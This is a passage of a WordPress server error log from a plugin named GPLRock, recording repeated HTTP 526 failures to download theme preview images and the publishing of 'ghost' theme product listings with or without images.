Error: . Retrying... [05-Apr-2026 13:51:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecova---eco-environmental-wordpress-theme-22279.webp for product ecova-eco-environmental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:03 UTC] GPLRock: Image download failed for product ecova-eco-environmental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:05 UTC] GPLRock: Image download failed for product ecova-eco-environmental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecova---eco-environmental-wordpress-theme-22279.webp for product ecova-eco-environmental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:07 UTC] GPLRock WARNING: Image download failed for product ecova-eco-environmental-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ecova---eco-environmental-wordpress-theme-22279.webp [05-Apr-2026 13:51:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecova-eco-environmental-wordpress-theme [05-Apr-2026 13:51:07 UTC] GPLRock: Image download failed for product allure-beauty-fashion-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:09 UTC] GPLRock: Image download failed for product allure-beauty-fashion-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allure---beauty--fashion-blog-wordpress-theme-23149.webp for product allure-beauty-fashion-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:12 UTC] GPLRock: Image download failed for product allure-beauty-fashion-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:14 UTC] GPLRock: Image download failed for product allure-beauty-fashion-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allure---beauty--fashion-blog-wordpress-theme-23149.webp for product allure-beauty-fashion-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:16 UTC] GPLRock WARNING: Image download failed for product allure-beauty-fashion-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/allure---beauty--fashion-blog-wordpress-theme-23149.webp [05-Apr-2026 13:51:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: allure-beauty-fashion-blog-wordpress-theme [05-Apr-2026 13:51:16 UTC] GPLRock: Image downloaded successfully for product new-high-fashion-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8ab8c5b.webp [05-Apr-2026 13:51:16 UTC] GPLRock: Using pre-downloaded image for product new-high-fashion-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8ab8c5b.webp [05-Apr-2026 13:51:16 UTC] GPLRock: Ghost product published with image - Product ID: new-high-fashion-woocommerce-wordpress-theme [05-Apr-2026 13:51:16 UTC] GPLRock: Image download failed for product mt-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:18 UTC] GPLRock: Image download failed for product mt-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mt-photography---wordpress-theme-22999.webp for product mt-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:21 UTC] GPLRock: Image download failed for product mt-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:23 UTC] GPLRock: Image download failed for product mt-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mt-photography---wordpress-theme-22999.webp for product mt-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:25 UTC] GPLRock WARNING: Image download failed for product mt-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mt-photography---wordpress-theme-22999.webp [05-Apr-2026 13:51:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mt-photography-wordpress-theme [05-Apr-2026 13:51:25 UTC] GPLRock: Image download failed for product vestige-museum-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:27 UTC] GPLRock: Image download failed for product vestige-museum-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vestige---museum-responsive-wordpress-theme-22337.webp for product vestige-museum-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:29 UTC] GPLRock: Image download failed for product vestige-museum-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:31 UTC] GPLRock: Image download failed for product vestige-museum-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vestige---museum-responsive-wordpress-theme-22337.webp for product vestige-museum-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:33 UTC] GPLRock WARNING: Image download failed for product vestige-museum-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vestige---museum-responsive-wordpress-theme-22337.webp [05-Apr-2026 13:51:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vestige-museum-responsive-wordpress-theme [05-Apr-2026 13:51:51 UTC] GPLRock: Image downloaded successfully for product pearlsell-wp-jewelry-elementor-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11e7c009.webp [05-Apr-2026 13:51:52 UTC] GPLRock: Using pre-downloaded image for product pearlsell-wp-jewelry-elementor-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11e7c009.webp [05-Apr-2026 13:51:52 UTC] GPLRock: Ghost product published with image - Product ID: pearlsell-wp-jewelry-elementor-woocommerce-theme [05-Apr-2026 13:51:52 UTC] GPLRock: Image download failed for product ibble-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:54 UTC] GPLRock: Image download failed for product ibble-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ibble---education-wordpress-theme-6818.webp for product ibble-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:51:56 UTC] GPLRock: Image download failed for product ibble-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:51:58 UTC] GPLRock: Image download failed for product ibble-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ibble---education-wordpress-theme-6818.webp for product ibble-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:00 UTC] GPLRock WARNING: Image download failed for product ibble-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ibble---education-wordpress-theme-6818.webp [05-Apr-2026 13:52:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ibble-education-wordpress-theme [05-Apr-2026 13:52:00 UTC] GPLRock: Image download failed for product metro-a-theme-for-vbulletin-4-and-5 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:03 UTC] GPLRock: Image download failed for product metro-a-theme-for-vbulletin-4-and-5 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/metro---a-theme-for-vbulletin-4-and-5-1550.webp for product metro-a-theme-for-vbulletin-4-and-5 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:05 UTC] GPLRock: Image download failed for product metro-a-theme-for-vbulletin-4-and-5 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:07 UTC] GPLRock: Image download failed for product metro-a-theme-for-vbulletin-4-and-5 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/metro---a-theme-for-vbulletin-4-and-5-1550.webp for product metro-a-theme-for-vbulletin-4-and-5 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:09 UTC] GPLRock WARNING: Image download failed for product metro-a-theme-for-vbulletin-4-and-5. URL: https://meldwp.com/wp-content/uploads/metro---a-theme-for-vbulletin-4-and-5-1550.webp [05-Apr-2026 13:52:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: metro-a-theme-for-vbulletin-4-and-5 [05-Apr-2026 13:52:09 UTC] GPLRock: Image download failed for product elevation-charitynonprofitfundraising-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:11 UTC] GPLRock: Image download failed for product elevation-charitynonprofitfundraising-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elevation---charitynonprofitfundraising-wp-theme-14984.webp for product elevation-charitynonprofitfundraising-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:14 UTC] GPLRock: Image download failed for product elevation-charitynonprofitfundraising-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:16 UTC] GPLRock: Image download failed for product elevation-charitynonprofitfundraising-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elevation---charitynonprofitfundraising-wp-theme-14984.webp for product elevation-charitynonprofitfundraising-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:18 UTC] GPLRock WARNING: Image download failed for product elevation-charitynonprofitfundraising-wp-theme. URL: https://meldwp.com/wp-content/uploads/elevation---charitynonprofitfundraising-wp-theme-14984.webp [05-Apr-2026 13:52:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elevation-charitynonprofitfundraising-wp-theme [05-Apr-2026 13:52:18 UTC] GPLRock: Image downloaded successfully for product craftio-carpenter-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-367456c9.webp [05-Apr-2026 13:52:18 UTC] GPLRock: Using pre-downloaded image for product craftio-carpenter-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-367456c9.webp [05-Apr-2026 13:52:18 UTC] GPLRock: Ghost product published with image - Product ID: craftio-carpenter-wordpress-theme [05-Apr-2026 13:52:18 UTC] GPLRock: Image downloaded successfully for product ink-a-wordpress-blogging-theme-to-tell-stories (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7feeae1a.webp [05-Apr-2026 13:52:18 UTC] GPLRock: Using pre-downloaded image for product ink-a-wordpress-blogging-theme-to-tell-stories: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7feeae1a.webp [05-Apr-2026 13:52:18 UTC] GPLRock: Ghost product published with image - Product ID: ink-a-wordpress-blogging-theme-to-tell-stories [05-Apr-2026 13:52:18 UTC] GPLRock: Image download failed for product around-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:20 UTC] GPLRock: Image download failed for product around-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/around---multipurpose-business-wordpress-theme-12501.webp for product around-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:23 UTC] GPLRock: Image download failed for product around-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:25 UTC] GPLRock: Image download failed for product around-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/around---multipurpose-business-wordpress-theme-12501.webp for product around-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:27 UTC] GPLRock WARNING: Image download failed for product around-multipurpose-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/around---multipurpose-business-wordpress-theme-12501.webp [05-Apr-2026 13:52:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: around-multipurpose-business-wordpress-theme [05-Apr-2026 13:52:27 UTC] GPLRock: Image download failed for product maacuni-multipurpose-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:29 UTC] GPLRock: Image download failed for product maacuni-multipurpose-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maacuni---multipurpose-creative-portfolio-wordpress-theme-5190.webp for product maacuni-multipurpose-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:31 UTC] GPLRock: Image download failed for product maacuni-multipurpose-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:33 UTC] GPLRock: Image download failed for product maacuni-multipurpose-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maacuni---multipurpose-creative-portfolio-wordpress-theme-5190.webp for product maacuni-multipurpose-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:36 UTC] GPLRock WARNING: Image download failed for product maacuni-multipurpose-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maacuni---multipurpose-creative-portfolio-wordpress-theme-5190.webp [05-Apr-2026 13:52:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maacuni-multipurpose-creative-portfolio-wordpress-theme [05-Apr-2026 13:52:36 UTC] GPLRock: Image download failed for product galax-ecommerce-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:38 UTC] GPLRock: Image download failed for product galax-ecommerce-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/galax---ecommerce-multi-purpose-wordpress-theme-4604.webp for product galax-ecommerce-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:40 UTC] GPLRock: Image download failed for product galax-ecommerce-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:42 UTC] GPLRock: Image download failed for product galax-ecommerce-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/galax---ecommerce-multi-purpose-wordpress-theme-4604.webp for product galax-ecommerce-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:44 UTC] GPLRock WARNING: Image download failed for product galax-ecommerce-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/galax---ecommerce-multi-purpose-wordpress-theme-4604.webp [05-Apr-2026 13:52:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: galax-ecommerce-multi-purpose-wordpress-theme [05-Apr-2026 13:52:44 UTC] GPLRock: Image download failed for product fortunio-carpenter-forestry-wood-manufacture-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:47 UTC] GPLRock: Image download failed for product fortunio-carpenter-forestry-wood-manufacture-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fortunio---carpenter-forestry-wood-manufacture-theme-1250.webp for product fortunio-carpenter-forestry-wood-manufacture-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:49 UTC] GPLRock: Image download failed for product fortunio-carpenter-forestry-wood-manufacture-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:51 UTC] GPLRock: Image download failed for product fortunio-carpenter-forestry-wood-manufacture-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:52:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fortunio---carpenter-forestry-wood-manufacture-theme-1250.webp for product fortunio-carpenter-forestry-wood-manufacture-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:52:53 UTC] GPLRock WARNING: Image download failed for product fortunio-carpenter-forestry-wood-manufacture-theme. URL: https://meldwp.com/wp-content/uploads/fortunio---carpenter-forestry-wood-manufacture-theme-1250.webp [05-Apr-2026 13:52:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fortunio-carpenter-forestry-wood-manufacture-theme [05-Apr-2026 13:53:16 UTC] GPLRock: Image download failed for product brook-creative-agency-business-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:18 UTC] GPLRock: Image download failed for product brook-creative-agency-business-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brook---creative-agency--business-html-template-7050.webp for product brook-creative-agency-business-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:20 UTC] GPLRock: Image download failed for product brook-creative-agency-business-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:22 UTC] GPLRock: Image download failed for product brook-creative-agency-business-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brook---creative-agency--business-html-template-7050.webp for product brook-creative-agency-business-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:24 UTC] GPLRock WARNING: Image download failed for product brook-creative-agency-business-html-template. URL: https://meldwp.com/wp-content/uploads/brook---creative-agency--business-html-template-7050.webp [05-Apr-2026 13:53:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: brook-creative-agency-business-html-template [05-Apr-2026 13:53:25 UTC] GPLRock: Image download failed for product m2-construction-and-tools-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:27 UTC] GPLRock: Image download failed for product m2-construction-and-tools-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/m2--construction-and-tools-store-wordpress-theme-17000.webp for product m2-construction-and-tools-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:29 UTC] GPLRock: Image download failed for product m2-construction-and-tools-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:31 UTC] GPLRock: Image download failed for product m2-construction-and-tools-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/m2--construction-and-tools-store-wordpress-theme-17000.webp for product m2-construction-and-tools-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:33 UTC] GPLRock WARNING: Image download failed for product m2-construction-and-tools-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/m2--construction-and-tools-store-wordpress-theme-17000.webp [05-Apr-2026 13:53:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: m2-construction-and-tools-store-wordpress-theme [05-Apr-2026 13:53:33 UTC] GPLRock: Image download failed for product cygnus-clean-and-minimalistic-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:36 UTC] GPLRock: Image download failed for product cygnus-clean-and-minimalistic-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cygnus---clean-and-minimalistic-portfolio-wordpress-theme-15585.webp for product cygnus-clean-and-minimalistic-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:38 UTC] GPLRock: Image download failed for product cygnus-clean-and-minimalistic-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:40 UTC] GPLRock: Image download failed for product cygnus-clean-and-minimalistic-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cygnus---clean-and-minimalistic-portfolio-wordpress-theme-15585.webp for product cygnus-clean-and-minimalistic-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:42 UTC] GPLRock WARNING: Image download failed for product cygnus-clean-and-minimalistic-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cygnus---clean-and-minimalistic-portfolio-wordpress-theme-15585.webp [05-Apr-2026 13:53:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cygnus-clean-and-minimalistic-portfolio-wordpress-theme [05-Apr-2026 13:53:42 UTC] GPLRock: Image download failed for product wavesurfer-surfing-and-water-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:44 UTC] GPLRock: Image download failed for product wavesurfer-surfing-and-water-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wavesurfer---surfing-and-water-sports-wordpress-theme-25175.webp for product wavesurfer-surfing-and-water-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:46 UTC] GPLRock: Image download failed for product wavesurfer-surfing-and-water-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:49 UTC] GPLRock: Image download failed for product wavesurfer-surfing-and-water-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wavesurfer---surfing-and-water-sports-wordpress-theme-25175.webp for product wavesurfer-surfing-and-water-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:51 UTC] GPLRock WARNING: Image download failed for product wavesurfer-surfing-and-water-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wavesurfer---surfing-and-water-sports-wordpress-theme-25175.webp [05-Apr-2026 13:53:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wavesurfer-surfing-and-water-sports-wordpress-theme [05-Apr-2026 13:53:51 UTC] GPLRock: Image download failed for product awsm-one-page-cv-resume-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:53 UTC] GPLRock: Image download failed for product awsm-one-page-cv-resume-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/awsm---one-page-cv--resume--personal-portfolio-wordpress-theme-29909.webp for product awsm-one-page-cv-resume-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:55 UTC] GPLRock: Image download failed for product awsm-one-page-cv-resume-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:57 UTC] GPLRock: Image download failed for product awsm-one-page-cv-resume-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:53:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/awsm---one-page-cv--resume--personal-portfolio-wordpress-theme-29909.webp for product awsm-one-page-cv-resume-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:53:59 UTC] GPLRock WARNING: Image download failed for product awsm-one-page-cv-resume-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/awsm---one-page-cv--resume--personal-portfolio-wordpress-theme-29909.webp [05-Apr-2026 13:53:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: awsm-one-page-cv-resume-personal-portfolio-wordpress-theme [05-Apr-2026 13:53:59 UTC] GPLRock: Image download failed for product allsmiles-dentist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:02 UTC] GPLRock: Image download failed for product allsmiles-dentist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allsmiles---dentist-wordpress-theme-28304.webp for product allsmiles-dentist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:04 UTC] GPLRock: Image download failed for product allsmiles-dentist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:06 UTC] GPLRock: Image download failed for product allsmiles-dentist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allsmiles---dentist-wordpress-theme-28304.webp for product allsmiles-dentist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:08 UTC] GPLRock WARNING: Image download failed for product allsmiles-dentist-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/allsmiles---dentist-wordpress-theme-28304.webp [05-Apr-2026 13:54:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: allsmiles-dentist-wordpress-theme [05-Apr-2026 13:54:08 UTC] GPLRock: Image download failed for product btext-creative-portfolio-digital-agency-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:10 UTC] GPLRock: Image download failed for product btext-creative-portfolio-digital-agency-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/btext---creative-portfolio--digital-agency-wordpress-elementor-theme-15806.webp for product btext-creative-portfolio-digital-agency-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:12 UTC] GPLRock: Image download failed for product btext-creative-portfolio-digital-agency-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:15 UTC] GPLRock: Image download failed for product btext-creative-portfolio-digital-agency-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/btext---creative-portfolio--digital-agency-wordpress-elementor-theme-15806.webp for product btext-creative-portfolio-digital-agency-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:17 UTC] GPLRock WARNING: Image download failed for product btext-creative-portfolio-digital-agency-wordpress-elementor-theme. URL: https://meldwp.com/wp-content/uploads/btext---creative-portfolio--digital-agency-wordpress-elementor-theme-15806.webp [05-Apr-2026 13:54:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: btext-creative-portfolio-digital-agency-wordpress-elementor-theme [05-Apr-2026 13:54:17 UTC] GPLRock: Image download failed for product sevenbite-health-and-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:19 UTC] GPLRock: Image download failed for product sevenbite-health-and-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sevenbite---health-and-medical-wordpress-theme-29102.webp for product sevenbite-health-and-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:21 UTC] GPLRock: Image download failed for product sevenbite-health-and-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:23 UTC] GPLRock: Image download failed for product sevenbite-health-and-medical-wordpress-theme (attempt 